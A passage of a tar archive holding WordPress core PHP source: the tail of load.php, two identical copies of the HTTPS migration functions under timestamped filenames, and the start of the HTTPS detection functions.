* addition to the admin backend, login pages and protected Ajax actions.
*
* @since 5.2.0
*
* @param bool $is_protected_endpoint Whether the currently requested endpoint is protected.
* Default false.
*/
return (bool) apply_filters( 'is_protected_endpoint', false );
}
/**
* Determines whether we are currently handling an Ajax action that should be protected against WSODs.
*
* @since 5.2.0
*
* @return bool True if the current Ajax action should be protected.
*/
function is_protected_ajax_action() {
if ( ! wp_doing_ajax() ) {
return false;
}
if ( ! isset( $_REQUEST['action'] ) ) {
return false;
}
$actions_to_protect = array(
'edit-theme-plugin-file', // Saving changes in the core code editor.
'heartbeat', // Keep the heart beating.
'install-plugin', // Installing a new plugin.
'install-theme', // Installing a new theme.
'search-plugins', // Searching in the list of plugins.
'search-install-plugins', // Searching for a plugin in the plugin install screen.
'update-plugin', // Update an existing plugin.
'update-theme', // Update an existing theme.
'activate-plugin', // Activating an existing plugin.
);
/**
* Filters the array of protected Ajax actions.
*
* This filter is only fired when doing Ajax and the Ajax request has an 'action' property.
*
* @since 5.2.0
*
* @param string[] $actions_to_protect Array of strings with Ajax actions to protect.
*/
$actions_to_protect = (array) apply_filters( 'wp_protected_ajax_actions', $actions_to_protect );
if ( ! in_array( $_REQUEST['action'], $actions_to_protect, true ) ) {
return false;
}
return true;
}
/**
* Sets internal encoding.
*
* In most cases the default internal encoding is latin1, which is
* of no use, since we want to use the `mb_` functions for `utf-8` strings.
*
* @since 3.0.0
* @access private
*/
function wp_set_internal_encoding() {
if ( function_exists( 'mb_internal_encoding' ) ) {
$charset = get_option( 'blog_charset' );
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
if ( ! $charset || ! @mb_internal_encoding( $charset ) ) {
mb_internal_encoding( 'UTF-8' );
}
}
}
/**
* Adds magic quotes to `$_GET`, `$_POST`, `$_COOKIE`, and `$_SERVER`.
*
* Also forces `$_REQUEST` to be `$_GET + $_POST`. If `$_SERVER`,
* `$_COOKIE`, or `$_ENV` are needed, use those superglobals directly.
*
* @since 3.0.0
* @access private
*/
function wp_magic_quotes() {
// Escape with wpdb.
$_GET = add_magic_quotes( $_GET );
$_POST = add_magic_quotes( $_POST );
$_COOKIE = add_magic_quotes( $_COOKIE );
$_SERVER = add_magic_quotes( $_SERVER );
// Force REQUEST to be GET + POST.
$_REQUEST = array_merge( $_GET, $_POST );
}
/**
* Runs just before PHP shuts down execution.
*
* @since 1.2.0
* @access private
*/
function shutdown_action_hook() {
/**
* Fires just before PHP shuts down execution.
*
* @since 1.2.0
*/
do_action( 'shutdown' );
wp_cache_close();
}
/**
* Clones an object.
*
* @since 2.7.0
* @deprecated 3.2.0
*
* @param object $input_object The object to clone.
* @return object The cloned object.
*/
function wp_clone( $input_object ) {
// Use parens for clone to accommodate PHP 4. See #17880.
return clone( $input_object );
}
/**
* Determines whether the current request is for the login screen.
*
* @since 6.1.0
*
* @see wp_login_url()
*
* @return bool True if inside WordPress login screen, false otherwise.
*/
function is_login() {
return false !== stripos( wp_login_url(), $_SERVER['SCRIPT_NAME'] );
}
/**
* Determines whether the current request is for an administrative interface page.
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 1.5.1
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress administration interface, false otherwise.
*/
function is_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin();
} elseif ( defined( 'WP_ADMIN' ) ) {
return WP_ADMIN;
}
return false;
}
/**
* Determines whether the current request is for a site's administrative interface.
*
* e.g. `/wp-admin/`
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* @since 3.1.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress site administration pages.
*/
function is_blog_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin( 'site' );
} elseif ( defined( 'WP_BLOG_ADMIN' ) ) {
return WP_BLOG_ADMIN;
}
return false;
}
/**
* Determines whether the current request is for the network administrative interface.
*
* e.g. `/wp-admin/network/`
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* Does not check if the site is a Multisite network; use is_multisite()
* for checking if Multisite is enabled.
*
* @since 3.1.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress network administration pages.
*/
function is_network_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin( 'network' );
} elseif ( defined( 'WP_NETWORK_ADMIN' ) ) {
return WP_NETWORK_ADMIN;
}
return false;
}
/**
* Determines whether the current request is for a user admin screen.
*
* e.g. `/wp-admin/user/`
*
* Does not check if the user is an administrator; use current_user_can()
* for checking roles and capabilities.
*
* @since 3.1.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool True if inside WordPress user administration pages.
*/
function is_user_admin() {
if ( isset( $GLOBALS['current_screen'] ) ) {
return $GLOBALS['current_screen']->in_admin( 'user' );
} elseif ( defined( 'WP_USER_ADMIN' ) ) {
return WP_USER_ADMIN;
}
return false;
}
/**
* Determines whether Multisite is enabled.
*
* @since 3.0.0
*
* @return bool True if Multisite is enabled, false otherwise.
*/
function is_multisite() {
if ( defined( 'MULTISITE' ) ) {
return MULTISITE;
}
if ( defined( 'SUBDOMAIN_INSTALL' ) || defined( 'VHOST' ) || defined( 'SUNRISE' ) ) {
return true;
}
return false;
}
/**
* Converts a value to non-negative integer.
*
* @since 2.5.0
*
* @param mixed $maybeint Data you wish to have converted to a non-negative integer.
* @return int A non-negative integer.
*/
function absint( $maybeint ) {
return abs( (int) $maybeint );
}
/**
* Retrieves the current site ID.
*
* @since 3.1.0
*
* @global int $blog_id
*
* @return int Site ID.
*/
function get_current_blog_id() {
global $blog_id;
return absint( $blog_id );
}
/**
* Retrieves the current network ID.
*
* @since 4.6.0
*
* @return int The ID of the current network.
*/
function get_current_network_id() {
if ( ! is_multisite() ) {
return 1;
}
$current_network = get_network();
if ( ! isset( $current_network->id ) ) {
return get_main_network_id();
}
return absint( $current_network->id );
}
/**
* Attempts an early load of translations.
*
* Used for errors encountered during the initial loading process, before
* the locale has been properly detected and loaded.
*
* Designed for unusual load sequences (like setup-config.php) or for when
* the script will then terminate with an error, otherwise there is a risk
* that a file can be double-included.
*
* @since 3.4.0
* @access private
*
* @global WP_Textdomain_Registry $wp_textdomain_registry WordPress Textdomain Registry.
* @global WP_Locale $wp_locale WordPress date and time locale object.
*/
function wp_load_translations_early() {
global $wp_textdomain_registry, $wp_locale;
static $loaded = false;
if ( $loaded ) {
return;
}
$loaded = true;
if ( function_exists( 'did_action' ) && did_action( 'init' ) ) {
return;
}
// We need $wp_local_package.
require ABSPATH . WPINC . '/version.php';
// Translation and localization.
require_once ABSPATH . WPINC . '/pomo/mo.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-controller.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translations.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-file.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-file-mo.php';
require_once ABSPATH . WPINC . '/l10n/class-wp-translation-file-php.php';
require_once ABSPATH . WPINC . '/l10n.php';
require_once ABSPATH . WPINC . '/class-wp-textdomain-registry.php';
require_once ABSPATH . WPINC . '/class-wp-locale.php';
require_once ABSPATH . WPINC . '/class-wp-locale-switcher.php';
// General libraries.
require_once ABSPATH . WPINC . '/plugin.php';
$locales = array();
$locations = array();
if ( ! $wp_textdomain_registry instanceof WP_Textdomain_Registry ) {
$wp_textdomain_registry = new WP_Textdomain_Registry();
}
while ( true ) {
if ( defined( 'WPLANG' ) ) {
if ( '' === WPLANG ) {
break;
}
$locales[] = WPLANG;
}
if ( isset( $wp_local_package ) ) {
$locales[] = $wp_local_package;
}
if ( ! $locales ) {
break;
}
if ( defined( 'WP_LANG_DIR' ) && @is_dir( WP_LANG_DIR ) ) {
$locations[] = WP_LANG_DIR;
}
if ( defined( 'WP_CONTENT_DIR' ) && @is_dir( WP_CONTENT_DIR . '/languages' ) ) {
$locations[] = WP_CONTENT_DIR . '/languages';
}
if ( @is_dir( ABSPATH . 'wp-content/languages' ) ) {
$locations[] = ABSPATH . 'wp-content/languages';
}
if ( @is_dir( ABSPATH . WPINC . '/languages' ) ) {
$locations[] = ABSPATH . WPINC . '/languages';
}
if ( ! $locations ) {
break;
}
$locations = array_unique( $locations );
foreach ( $locales as $locale ) {
foreach ( $locations as $location ) {
if ( file_exists( $location . '/' . $locale . '.mo' ) ) {
load_textdomain( 'default', $location . '/' . $locale . '.mo', $locale );
if ( defined( 'WP_SETUP_CONFIG' ) && file_exists( $location . '/admin-' . $locale . '.mo' ) ) {
load_textdomain( 'default', $location . '/admin-' . $locale . '.mo', $locale );
}
break 2;
}
}
}
break;
}
$wp_locale = new WP_Locale();
}
/**
* Checks or sets whether WordPress is in "installation" mode.
*
* If the `WP_INSTALLING` constant is defined during the bootstrap, `wp_installing()` will default to `true`.
*
* @since 4.4.0
*
* @param bool $is_installing Optional. True to set WP into Installing mode, false to turn Installing mode off.
* Omit this parameter if you only want to fetch the current status.
* @return bool True if WP is installing, otherwise false. When a `$is_installing` is passed, the function will
* report whether WP was in installing mode prior to the change to `$is_installing`.
*/
function wp_installing( $is_installing = null ) {
static $installing = null;
// Support for the `WP_INSTALLING` constant, defined before WP is loaded.
if ( is_null( $installing ) ) {
$installing = defined( 'WP_INSTALLING' ) && WP_INSTALLING;
}
if ( ! is_null( $is_installing ) ) {
$old_installing = $installing;
$installing = $is_installing;
return (bool) $old_installing;
}
return (bool) $installing;
}
/**
* Determines if SSL is used.
*
* @since 2.6.0
* @since 4.6.0 Moved from functions.php to load.php.
*
* @return bool True if SSL, otherwise false.
*/
function is_ssl() {
if ( isset( $_SERVER['HTTPS'] ) ) {
if ( 'on' === strtolower( $_SERVER['HTTPS'] ) ) {
return true;
}
if ( '1' === (string) $_SERVER['HTTPS'] ) {
return true;
}
} elseif ( isset( $_SERVER['SERVER_PORT'] ) && ( '443' === (string) $_SERVER['SERVER_PORT'] ) ) {
return true;
}
return false;
}
/**
* Converts a shorthand byte value to an integer byte value.
*
* @since 2.3.0
* @since 4.6.0 Moved from media.php to load.php.
*
* @link https://www.php.net/manual/en/function.ini-get.php
* @link https://www.php.net/manual/en/faq.using.php#faq.using.shorthandbytes
*
* @param string $value A (PHP ini) byte value, either shorthand or ordinary.
* @return int An integer byte value.
*/
function wp_convert_hr_to_bytes( $value ) {
$value = strtolower( trim( $value ) );
$bytes = (int) $value;
if ( str_contains( $value, 'g' ) ) {
$bytes *= GB_IN_BYTES;
} elseif ( str_contains( $value, 'm' ) ) {
$bytes *= MB_IN_BYTES;
} elseif ( str_contains( $value, 'k' ) ) {
$bytes *= KB_IN_BYTES;
}
// Deal with large (float) values which run into the maximum integer size.
return min( $bytes, PHP_INT_MAX );
}
/**
* Determines whether a PHP ini value is changeable at runtime.
*
* @since 4.6.0
*
* @link https://www.php.net/manual/en/function.ini-get-all.php
*
* @param string $setting The name of the ini setting to check.
* @return bool True if the value is changeable at runtime. False otherwise.
*/
function wp_is_ini_value_changeable( $setting ) {
static $ini_all;
if ( ! isset( $ini_all ) ) {
$ini_all = false;
// Sometimes `ini_get_all()` is disabled via the `disable_functions` option for "security purposes".
if ( function_exists( 'ini_get_all' ) ) {
$ini_all = ini_get_all();
}
}
if ( isset( $ini_all[ $setting ]['access'] )
&& ( INI_ALL === $ini_all[ $setting ]['access'] || INI_USER === $ini_all[ $setting ]['access'] )
) {
return true;
}
// If we were unable to retrieve the details, fail gracefully to assume it's changeable.
if ( ! is_array( $ini_all ) ) {
return true;
}
return false;
}
/**
* Determines whether the current request is a WordPress Ajax request.
*
* @since 4.7.0
*
* @return bool True if it's a WordPress Ajax request, false otherwise.
*/
function wp_doing_ajax() {
/**
* Filters whether the current request is a WordPress Ajax request.
*
* @since 4.7.0
*
* @param bool $wp_doing_ajax Whether the current request is a WordPress Ajax request.
*/
return apply_filters( 'wp_doing_ajax', defined( 'DOING_AJAX' ) && DOING_AJAX );
}
/**
* Determines whether the current request should use themes.
*
* @since 5.1.0
*
* @return bool True if themes should be used, false otherwise.
*/
function wp_using_themes() {
/**
* Filters whether the current request should use themes.
*
* @since 5.1.0
*
* @param bool $wp_using_themes Whether the current request should use themes.
*/
return apply_filters( 'wp_using_themes', defined( 'WP_USE_THEMES' ) && WP_USE_THEMES );
}
/**
* Determines whether the current request is a WordPress cron request.
*
* @since 4.8.0
*
* @return bool True if it's a WordPress cron request, false otherwise.
*/
function wp_doing_cron() {
/**
* Filters whether the current request is a WordPress cron request.
*
* @since 4.8.0
*
* @param bool $wp_doing_cron Whether the current request is a WordPress cron request.
*/
return apply_filters( 'wp_doing_cron', defined( 'DOING_CRON' ) && DOING_CRON );
}
/**
* Checks whether the given variable is a WordPress Error.
*
* Returns whether `$thing` is an instance of the `WP_Error` class.
*
* @since 2.1.0
*
* @param mixed $thing The variable to check.
* @return bool Whether the variable is an instance of WP_Error.
*/
function is_wp_error( $thing ) {
$is_wp_error = ( $thing instanceof WP_Error );
if ( $is_wp_error ) {
/**
* Fires when `is_wp_error()` is called and its parameter is an instance of `WP_Error`.
*
* @since 5.6.0
*
* @param WP_Error $thing The error object passed to `is_wp_error()`.
*/
do_action( 'is_wp_error_instance', $thing );
}
return $is_wp_error;
}
/**
* Determines whether file modifications are allowed.
*
* @since 4.8.0
*
* @param string $context The usage context.
* @return bool True if file modification is allowed, false otherwise.
*/
function wp_is_file_mod_allowed( $context ) {
/**
* Filters whether file modifications are allowed.
*
* @since 4.8.0
*
* @param bool $file_mod_allowed Whether file modifications are allowed.
* @param string $context The usage context.
*/
return apply_filters( 'file_mod_allowed', ! defined( 'DISALLOW_FILE_MODS' ) || ! DISALLOW_FILE_MODS, $context );
}
/**
* Starts scraping edited file errors.
*
* @since 4.9.0
*/
function wp_start_scraping_edited_file_errors() {
if ( ! isset( $_REQUEST['wp_scrape_key'] ) || ! isset( $_REQUEST['wp_scrape_nonce'] ) ) {
return;
}
$key = substr( sanitize_key( wp_unslash( $_REQUEST['wp_scrape_key'] ) ), 0, 32 );
$nonce = wp_unslash( $_REQUEST['wp_scrape_nonce'] );
if ( empty( $key ) || empty( $nonce ) ) {
return;
}
$transient = get_transient( 'scrape_key_' . $key );
if ( false === $transient ) {
return;
}
if ( $transient !== $nonce ) {
if ( ! headers_sent() ) {
header( 'X-Robots-Tag: noindex' );
nocache_headers();
}
echo "###### wp_scraping_result_start:$key ######";
echo wp_json_encode(
array(
'code' => 'scrape_nonce_failure',
'message' => __( 'Scrape key check failed. Please try again.' ),
)
);
echo "###### wp_scraping_result_end:$key ######";
die();
}
if ( ! defined( 'WP_SANDBOX_SCRAPING' ) ) {
define( 'WP_SANDBOX_SCRAPING', true );
}
register_shutdown_function( 'wp_finalize_scraping_edited_file_errors', $key );
}
/**
* Finalizes scraping for edited file errors.
*
* @since 4.9.0
*
* @param string $scrape_key Scrape key.
*/
function wp_finalize_scraping_edited_file_errors( $scrape_key ) {
$error = error_get_last();
echo "\n###### wp_scraping_result_start:$scrape_key ######\n";
if ( ! empty( $error )
&& in_array( $error['type'], array( E_CORE_ERROR, E_COMPILE_ERROR, E_ERROR, E_PARSE, E_USER_ERROR, E_RECOVERABLE_ERROR ), true )
) {
$error = str_replace( ABSPATH, '', $error );
echo wp_json_encode( $error );
} else {
echo wp_json_encode( true );
}
echo "\n###### wp_scraping_result_end:$scrape_key ######\n";
}
/**
* Checks whether current request is a JSON request, or is expecting a JSON response.
*
* @since 5.0.0
*
* @return bool True if `Accepts` or `Content-Type` headers contain `application/json`.
* False otherwise.
*/
function wp_is_json_request() {
if ( isset( $_SERVER['HTTP_ACCEPT'] ) && wp_is_json_media_type( $_SERVER['HTTP_ACCEPT'] ) ) {
return true;
}
if ( isset( $_SERVER['CONTENT_TYPE'] ) && wp_is_json_media_type( $_SERVER['CONTENT_TYPE'] ) ) {
return true;
}
return false;
}
/**
* Checks whether current request is a JSONP request, or is expecting a JSONP response.
*
* @since 5.2.0
*
* @return bool True if JSONP request, false otherwise.
*/
function wp_is_jsonp_request() {
if ( ! isset( $_GET['_jsonp'] ) ) {
return false;
}
if ( ! function_exists( 'wp_check_jsonp_callback' ) ) {
require_once ABSPATH . WPINC . '/functions.php';
}
$jsonp_callback = $_GET['_jsonp'];
if ( ! wp_check_jsonp_callback( $jsonp_callback ) ) {
return false;
}
/** This filter is documented in wp-includes/rest-api/class-wp-rest-server.php */
$jsonp_enabled = apply_filters( 'rest_jsonp_enabled', true );
return $jsonp_enabled;
}
/**
* Checks whether a string is a valid JSON Media Type.
*
* @since 5.6.0
*
* @param string $media_type A Media Type string to check.
* @return bool True if string is a valid JSON Media Type.
*/
function wp_is_json_media_type( $media_type ) {
static $cache = array();
if ( ! isset( $cache[ $media_type ] ) ) {
$cache[ $media_type ] = (bool) preg_match( '/(^|\s|,)application\/([\w!#\$&-\^\.\+]+\+)?json(\+oembed)?($|\s|;|,)/i', $media_type );
}
return $cache[ $media_type ];
}
/**
* Checks whether current request is an XML request, or is expecting an XML response.
*
* @since 5.2.0
*
* @return bool True if `Accepts` or `Content-Type` headers contain `text/xml`
* or one of the related MIME types. False otherwise.
*/
function wp_is_xml_request() {
$accepted = array(
'text/xml',
'application/rss+xml',
'application/atom+xml',
'application/rdf+xml',
'text/xml+oembed',
'application/xml+oembed',
);
if ( isset( $_SERVER['HTTP_ACCEPT'] ) ) {
foreach ( $accepted as $type ) {
if ( str_contains( $_SERVER['HTTP_ACCEPT'], $type ) ) {
return true;
}
}
}
if ( isset( $_SERVER['CONTENT_TYPE'] ) && in_array( $_SERVER['CONTENT_TYPE'], $accepted, true ) ) {
return true;
}
return false;
}
/**
* Checks if this site is protected by HTTP Basic Auth.
*
* At the moment, this merely checks for the present of Basic Auth credentials. Therefore, calling
* this function with a context different from the current context may give inaccurate results.
* In a future release, this evaluation may be made more robust.
*
* Currently, this is only used by Application Passwords to prevent a conflict since it also utilizes
* Basic Auth.
*
* @since 5.6.1
*
* @global string $pagenow The filename of the current screen.
*
* @param string $context The context to check for protection. Accepts 'login', 'admin', and 'front'.
* Defaults to the current context.
* @return bool Whether the site is protected by Basic Auth.
*/
function wp_is_site_protected_by_basic_auth( $context = '' ) {
global $pagenow;
if ( ! $context ) {
if ( 'wp-login.php' === $pagenow ) {
$context = 'login';
} elseif ( is_admin() ) {
$context = 'admin';
} else {
$context = 'front';
}
}
$is_protected = ! empty( $_SERVER['PHP_AUTH_USER'] ) || ! empty( $_SERVER['PHP_AUTH_PW'] );
/**
* Filters whether a site is protected by HTTP Basic Auth.
*
* @since 5.6.1
*
* @param bool $is_protected Whether the site is protected by Basic Auth.
* @param string $context The context to check for protection. One of 'login', 'admin', or 'front'.
*/
return apply_filters( 'wp_is_site_protected_by_basic_auth', $is_protected, $context );
}
https-migration-20260605165221-20260621081210-20260621132946.php 0000666 00000011205 15224151220 0014733 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605131603.php 0000666 00000011205 15224151220 0011763 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605091832-20260621081205.php 0000666 00000013341 15224151220 0013344 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
